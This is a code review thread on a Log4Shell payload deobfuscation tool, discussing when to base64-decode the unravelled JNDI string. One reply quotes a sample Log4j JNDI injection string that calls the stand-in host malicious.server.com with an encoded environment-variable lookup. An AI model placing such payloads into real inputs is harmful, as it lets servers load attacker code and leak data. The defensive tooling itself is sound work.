lib/deobfuscate.py

```diff
@@ -46,7 +63,7 @@ def deobfuscate(payload: str, max_depth: int = DEFAULT_MAX_DEPTH) -> str:
 
         if deobfuscated == payload:
             logger.debug("Payload equals deobfuscated, exiting loop")
-            return deobfuscated
+            return parse_base64_payload(deobfuscated)
```

Comment:
I wouldn't wrap the return value with `parse_base64_payload`, I would do that in the `deobfuscate` function if the flag was provided.

Reply:
Another issue that might occur, the full unraveled `jndi` tag will most likely show up on the last iteration, so decoding within every iteration might result in inaccurate results, for example:

If the payload is: `${jndi:ldap://malicious.server.com/Basic/Command/Base64/JHtlbnY6UFdEfQ==}`
After one iteration it will reduce to: `${jndi:ldap://malicious.server.com/Basic/Command/Base64/${env:PWD}}`
Then the following iteration will try and resolve `${env:PWD}`, which will inject the resolved value within it, not according to the Log4j logic.

The gist of this is that we should try and decode the payload only ONCE and after all iterations were consumed.

Reply:
The decoding is happing only when `deobfuscated == payload`.

Reply:
> I wouldn't wrap the return value with `parse_base64_payload`, I would do that in the `deobfuscate` function if the flag was provided.

Fixed

Reply:
> I wouldn't wrap the return value with `parse_base64_payload`, I would do that in the `deobfuscate` function if the flag was provided.

Fixed